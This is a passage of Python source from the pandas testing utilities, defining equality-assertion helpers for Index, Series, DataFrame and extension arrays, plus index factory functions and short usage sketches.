5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default True
Whether to compare number exactly.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_order : bool, default True
Whether to compare the order of index entries as well as their values.
If True, both indexes must contain the same elements, in the same order.
If False, both indexes must contain the same elements, but in any order.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Index'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
def _check_types(l, r, obj="Index"):
if exact:
assert_class_equal(l, r, exact=exact, obj=obj)
# Skip exact dtype checking when `check_categorical` is False
if check_categorical:
assert_attr_equal("dtype", l, r, obj=obj)
# allow string-like to have different inferred_types
            if l.inferred_type in ("string",):
                assert r.inferred_type in ("string",)
else:
assert_attr_equal("inferred_type", l, r, obj=obj)
def _get_ilevel_values(index, level):
# accept level number only
unique = index.levels[level]
level_codes = index.codes[level]
filled = take_1d(unique._values, level_codes, fill_value=unique._na_value)
return unique._shallow_copy(filled, name=index.names[level])
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Index)
# class / dtype comparison
_check_types(left, right, obj=obj)
# level comparison
if left.nlevels != right.nlevels:
msg1 = f"{obj} levels are different"
msg2 = f"{left.nlevels}, {left}"
msg3 = f"{right.nlevels}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# length comparison
if len(left) != len(right):
msg1 = f"{obj} length are different"
msg2 = f"{len(left)}, {left}"
msg3 = f"{len(right)}, {right}"
raise_assert_detail(obj, msg1, msg2, msg3)
# If order doesn't matter then sort the index entries
if not check_order:
left = left.sort_values()
right = right.sort_values()
    # MultiIndex special comparison for more friendly error messages
if left.nlevels > 1:
left = cast(MultiIndex, left)
right = cast(MultiIndex, right)
for level in range(left.nlevels):
# cannot use get_level_values here because it can change dtype
llevel = _get_ilevel_values(left, level)
rlevel = _get_ilevel_values(right, level)
lobj = f"MultiIndex level [{level}]"
assert_index_equal(
llevel,
rlevel,
exact=exact,
check_names=check_names,
check_exact=check_exact,
rtol=rtol,
atol=atol,
obj=lobj,
)
# get_level_values may change dtype
_check_types(left.levels[level], right.levels[level], obj=obj)
# skip exact index checking when `check_categorical` is False
if check_exact and check_categorical:
if not left.equals(right):
diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
rtol=rtol,
atol=atol,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left._values, right._values)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(left._values, right._values, obj=f"{obj} category")
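# Usage sketch for assert_index_equal (illustrative, not called anywhere): with
# exact="equiv" a RangeIndex and a regular integer Index holding the same values
# are treated as equivalent classes.
def _example_assert_index_equal():
    left = RangeIndex(start=0, stop=3)
    right = Index([0, 1, 2])
    assert_index_equal(left, right, exact="equiv")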
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
return type(x).__name__
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr: str, left, right, obj: str = "Attributes"):
"""
Check attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""
Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
        Check that the integer dtype of the codes is the same.
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes"
)
else:
try:
lc = left.categories.sort_values()
rc = right.categories.sort_values()
except TypeError:
# e.g. '<' not supported between instances of 'int' and 'str'
lc, rc = left.categories, right.categories
assert_index_equal(lc, rc, obj=f"{obj}.categories")
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""
Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
kwargs = {}
if left._left.dtype.kind in ["m", "M"]:
# We have a DatetimeArray or TimedeltaArray
kwargs["check_freq"] = False
assert_equal(left._left, right._left, obj=f"{obj}.left", **kwargs)
    assert_equal(left._right, right._right, obj=f"{obj}.right", **kwargs)
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray", check_freq=True):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
if check_freq:
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None, index_values=None):
__tracebackhide__ = True
msg = f"""{obj} are different
{message}"""
if isinstance(index_values, np.ndarray):
msg += f"\n[index]: {pprint_thing(index_values)}"
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg += f"""
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
index_values=None,
):
"""
    Check that two 'np.ndarray' objects are equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
index_values : numpy.ndarray, default None
optional index (shared by both left and right), used in output.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right, index_values=index_values)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left,
right,
check_dtype=True,
index_values=None,
check_less_precise=no_default,
check_exact=False,
rtol: float = 1.0e-5,
atol: float = 1.0e-8,
):
"""
Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare.
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
index_values : numpy.ndarray, default None
Optional index (shared by both left and right), used in output.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_exact : bool, default False
Whether to compare number exactly.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if (
isinstance(left, DatetimeLikeArrayMixin)
and isinstance(right, DatetimeLikeArrayMixin)
and type(right) == type(left)
):
# Avoid slow object-dtype comparisons
# np.asarray for case where we have a np.MaskedArray
assert_numpy_array_equal(
np.asarray(left.asi8), np.asarray(right.asi8), index_values=index_values
)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(
left_na, right_na, obj="ExtensionArray NA mask", index_values=index_values
)
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(
left_valid, right_valid, obj="ExtensionArray", index_values=index_values
)
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
rtol=rtol,
atol=atol,
obj="ExtensionArray",
index_values=index_values,
)
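# Usage sketch for assert_extension_array_equal (illustrative, not called): the
# NA masks are compared separately, so missing values in matching positions pass
# even though pd.NA never compares equal to itself.
def _example_assert_extension_array_equal():
    left = pd.array([1, 2, None], dtype="Int64")
    right = pd.array([1, 2, None], dtype="Int64")
    assert_extension_array_equal(left, right)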
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=no_default,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_category_order=True,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_category_order : bool, default True
Whether to compare category order of internal Categoricals.
.. versionadded:: 1.0.2
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
.. versionadded:: 1.2.0
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
if check_freq and isinstance(left.index, (pd.DatetimeIndex, pd.TimedeltaIndex)):
lidx = left.index
ridx = right.index
assert lidx.freq == ridx.freq, (lidx.freq, ridx.freq)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left.dtype)
and is_categorical_dtype(right.dtype)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact and is_numeric_dtype(left.dtype) and is_numeric_dtype(right.dtype):
# Only check exact if dtype is numeric
assert_numpy_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif check_datetimelike_compat and (
needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype)
):
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left._values).equals(Index(right._values)):
msg = (
f"[datetimelike_compat=True] {left._values} "
f"is not equal to {right._values}."
)
raise AssertionError(msg)
elif is_interval_dtype(left.dtype) and is_interval_dtype(right.dtype):
assert_interval_array_equal(left.array, right.array)
elif is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
elif is_extension_array_dtype(left.dtype) and is_extension_array_dtype(right.dtype):
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
elif needs_i8_conversion(left.dtype) or needs_i8_conversion(right.dtype):
# DatetimeArray or TimedeltaArray
assert_extension_array_equal(
left._values,
right._values,
check_dtype=check_dtype,
index_values=np.asarray(left.index),
)
else:
_testing.assert_almost_equal(
left._values,
right._values,
rtol=rtol,
atol=atol,
check_dtype=check_dtype,
obj=str(obj),
index_values=np.asarray(left.index),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left.dtype) or is_categorical_dtype(right.dtype):
assert_categorical_equal(
left._values,
right._values,
obj=f"{obj} category",
check_category_order=check_category_order,
)
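# Usage sketch for assert_series_equal (illustrative, not called anywhere):
# check_dtype=False is the most commonly relaxed knob, accepting identical
# values stored as int64 versus float64.
def _example_assert_series_equal():
    left = Series([1, 2, 3], dtype="int64")
    right = Series([1.0, 2.0, 3.0], dtype="float64")
    assert_series_equal(left, right, check_dtype=False)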
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=no_default,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
check_freq=True,
check_flags=True,
rtol=1.0e-5,
atol=1.0e-8,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
    differences. It is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
.. deprecated:: 1.1.0
Use `rtol` and `atol` instead to define relative/absolute
tolerance, respectively. Similar to :func:`math.isclose`.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
check_freq : bool, default True
Whether to check the `freq` attribute on a DatetimeIndex or TimedeltaIndex.
check_flags : bool, default True
Whether to check the `flags` attribute.
rtol : float, default 1e-5
Relative tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
atol : float, default 1e-8
Absolute tolerance. Only used when check_exact is False.
.. versionadded:: 1.1.0
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
if check_less_precise is not no_default:
warnings.warn(
"The 'check_less_precise' keyword in testing.assert_*_equal "
"is deprecated and will be removed in a future version. "
"You can stop passing 'check_less_precise' to silence this warning.",
FutureWarning,
stacklevel=2,
)
rtol = atol = _get_tol_from_less_precise(check_less_precise)
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}"
)
if check_flags:
assert left.flags == right.flags, f"{repr(left.flags)} != {repr(right.flags)}"
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_exact=check_exact,
check_categorical=check_categorical,
check_order=not check_like,
rtol=rtol,
atol=atol,
obj=f"{obj}.columns",
)
if check_like:
left, right = left.reindex_like(right), right
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
check_freq=check_freq,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
rtol=rtol,
atol=atol,
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
if isinstance(left, (pd.DatetimeIndex, pd.TimedeltaIndex)):
assert left.freq == right.freq, (left.freq, right.freq)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
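# Usage sketch for assert_equal (illustrative, not called anywhere): one entry
# point dispatches to the type-specific helpers above.
def _example_assert_equal_dispatch():
    assert_equal(Index([1, 2, 3]), Index([1, 2, 3]))
    assert_equal(Series([1.0, 2.0]), Series([1.0, 2.0]))
    assert_equal(np.array([1, 2]), np.array([1, 2]))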
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
expected = pd.array(expected)
elif box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
            # for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
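# Usage sketch for box_expected (illustrative, not called anywhere): the same
# expected values wrapped in different boxes; the DataFrame case is transposed
# to a single row, as explained in the comment above.
def _example_box_expected():
    values = np.array([1, 2, 3])
    as_series = box_expected(values, Series)     # Series of length 3
    as_frame = box_expected(values, DataFrame)   # 1 row x 3 columns
    return as_series, as_frame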
def to_array(obj):
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if is_period_dtype(dtype):
return period_array(obj)
elif is_datetime64_dtype(dtype) or is_datetime64tz_dtype(dtype):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(dtype):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(left, right):
"""
Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
left_index = left.sp_index
right_index = right.sp_index
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
        # indexes are equal; nothing more to compare
pass
assert_attr_equal("fill_value", left, right)
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense())
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
